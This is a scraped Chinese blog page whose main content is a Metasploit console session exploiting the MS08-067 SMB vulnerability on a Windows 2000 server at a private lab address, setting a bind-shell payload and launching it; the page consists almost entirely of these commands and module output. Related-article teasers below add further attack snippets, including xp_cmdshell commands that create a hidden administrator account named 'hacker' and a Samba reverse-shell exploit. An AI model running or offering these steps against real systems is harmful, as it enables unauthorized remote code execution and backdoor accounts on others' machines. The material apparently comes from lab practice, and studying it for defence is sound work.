Ubuntu10.04下使用metasploit对win2000 server进行MS08-067溢出

最新推荐文章于 2021-12-03 08:40:05 发布
最新推荐文章于 2021-12-03 08:40:05 发布
阅读量584 收藏
点赞数
分类专栏: Hacking 文章标签: ubuntu server browser service
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6773656
版权

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ——–  ———–
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:

   Id  Name
   –  —-
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.121.129
RHOST => 192.168.121.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set LPORT 9999
LPORT => 9999
msf exploit(ms08_067_netapi) > exploit

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows漏洞:MS08-067
Nanyeer的博客
03-21 1674
MS08-067漏洞(远程命令执行漏洞)的演示
linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录
weixin_28747937的博客
05-15 857
环境: 攻击机:192.168.200.101 //kali Linux 2020靶机:192.168.200.103 (未打MS17-010补丁windowsServices2008.x64)1:msfconsole //进入me...
MS 08-067失败过程记录
weixin_51387754的博客
06-20 423
建好后开启使用enter FN+F8我同意 由于是选择安装分区。由于我们是新建的虚拟机,所以上面的磁盘是空白的,我们需要先新建分区,按C键新建分区(建议划分2个分区,一个作为系统盘,一个作为数据盘)。 新建分区之后要进行格式化,对C:盘进行格式化。推荐使用NTFS文件系统格式磁盘分区,因为其能支持更多的功能。 格式化完成后虚拟机将自动重启。之后进入安装向导,点击“下一步”。 设置区域及语言,核对一下是否正确。点击“下一步”。 输入姓名或者单位。这个不是很重要,随便填一下就可以。 计算机名默认就.
通过MSSQL 2000 入侵服务器主机器
生活要快乐 - 魏言
03-01 626
首先确保得到数据库超级管理员权限然后执行如下SQL命令:1、exec master.dbo.xp_cmdshell net user hacker hacker /add 2、exec master.dbo.xp_cmdshell net localgroup administrators hacker /add  解释:1.通过调用cmdshell   也就是cmd
针对利用ms_08_067漏洞攻击靶机出现的问题
weixin_42387926的博客
12-03 3304
试了4个虚拟机,终于可以成功攻击了 第一个是windows2000,不知道这么多版本有啥区别 然后这个虚拟机厉害了,一exploit靶机直接倒计时关机,这防御手段玉石俱焚 windows2000 无法解决,kali机也显示攻击失败 第二个是下载了一个windowsXP 好像是SP2中文 这个445端口就没开,然后找资料把它打开,然后exploit后显示对方445端口不接收还是啥的,防火墙也关了,不李姐,然后看到有人说是不是只对英文版攻击有效,果断再换(但看到有中文版攻击成功的) 然后换成windowsXPS
Metasploit攻击xp,windows/smb/ms08_067_netapi
Shiliang1995
10-23 1911
第一步 安装XP虚拟机 这里用的系统版本如下 然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击 所以先对XP设置一下 编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters 在Parameters上右键...
微软ms08-067渗透实践
Louisnie
08-29 5282
简单描述:MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的...
ms08_067漏洞的使用艺术
CODING...
11-10 1万+
ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞。现在我们就使用metasploit利用ms08_067漏洞对XP虚拟机进行渗透。博主使用的是kali linux 2.0对一台windows XP SP3的虚拟机进行渗透测试。1.使用windows/shell/reverse_tcp首先我们先是用windows/shell_bind_tc
Ubuntu10.04使用metasploitwin2000 server进行MS06-040溢出
收集盒 Book box
09-14 2288
msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > set RHOST 192.168.121.129 RHOST => 192.168.121.129 msf explo
03.[445]samba-linux
有梦就别怕痛
09-20 595
msf > search samba msf > use exploit/multi/samba/usermap_script  msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse msf exploit(multi/samba/usermap_script) > set RHOST ...
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1254
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
metasploit扫描mssqlserver2000
天元喜羊羊的博客
04-07 3045
用的metasploit是4.5.0,安装在fedora 9上面。mssqlserver2000 + sp4安装在XP+sp3上面。关闭xp的防火墙,启动mssqlserver2000,新建SQL Server注册。然后运行metasploit。启动msfconsole要花好20秒左右,第一次不知道,还以为安装错了呢。 [root@localhost app]# pwd /opt/metaspl
Windows内核溢出漏洞提权
谢公子的博客
02-12 6884
目录 内核溢出漏洞提权 实战MSF中CVE-2018-8120模块本地溢出漏洞提权 查看系统补丁 选择利用模块攻击 内核溢出漏洞提权 本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。 github上windows系统溢出漏洞提权的汇总...
使用MetaSploitWinXP对Win2000进行攻击
爬来爬去的专栏
08-11 738
使用MetaSploitWinXP对Win2000进行攻击学习0day这本书时所做的实验,由于软件版本不好找,给同时学习的人写个借鉴,本人菜鸟一枚,仅仅总结自己的经验 虚拟机环境不作叙述,自己摸索着配吧 MetaSploit适合WinXP版本的密码:xfg1 如果以后误删的话可以找我要~ 安装过程中可能会出现如下错误: 这里点击“OK”退出,然后到metasploit目录底下有个vc2008
Metasploit-MSSQL渗透-实战篇
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
BT5入侵mssql
天元喜羊羊的博客
08-18 3643
mssql_ping: msf auxiliary(mssql_ping) > show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- ---
Ubuntu10.04 教程:使用F-Spot管理照片
"Ubuntu10.04(lucid)中文教程_part3主要介绍了如何使用F-Spot照片管理器处理和管理图像。用户可以学习如何从计算机硬盘或数码相机导入照片,以及查看和管理这些照片的方法。" 在Ubuntu 10.04 (Lucid Lynx)操作系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值